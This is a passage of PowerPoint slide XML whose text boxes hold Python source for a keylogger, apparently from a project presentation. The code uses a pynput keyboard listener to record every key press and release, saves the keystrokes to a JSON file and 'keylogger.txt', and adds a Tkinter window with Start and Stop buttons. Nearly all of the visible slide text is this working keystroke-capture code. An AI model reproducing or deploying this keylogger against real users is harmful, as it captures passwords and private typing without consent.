                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(key):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    global flag, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, keys</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used.append</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        {'Released': f'{key}'}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    if flag == True:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        flag = False</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>generate_json_file</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN" err="1">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keys_used</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr dirty="0" sz="800" lang="en-IN">
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>    </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1048608" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4409665" y="1348800"/>
            <a:ext cx="2956335" cy="3749040"/>
          </a:xfrm>
          <a:prstGeom prst="rect"/>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr rtlCol="0" wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>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keys = keys + str(key)</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a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>generate_text_log</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(str(keys))</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def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>():</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global listener</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listener = </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>keyboard.Listener</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_press</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>on_release</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</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a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>listener.start</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</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a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(text="[+] Keylogger is running!\n[!] Saving the keys in 'keylogger.txt'")</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a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(state='disabled')</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a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(state='normal')</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def </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>():</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global listener</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a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>listener.stop</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</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a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(text="Keylogger stopped.")</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a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(state='normal')</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a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>stop_button.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(state='disabled')</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root = Tk()</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1" latinLnBrk="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>root.title</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("Keylogger")</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label = Label(root, text='Click "Start" to begin keylogging.')</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1" latinLnBrk="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>label.config</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(anchor=CENTER)</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1" latinLnBrk="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>label.pack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1" latinLnBrk="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start_button</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = Button(root, text="Start", command=</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>start_keylogger</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="800" kern="1200" lang="en-IN">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr dirty="0" sz="800" lang="en-IN">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="l" eaLnBrk="1" hangingPunct="1" latinLnBrk="0" marL="0" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
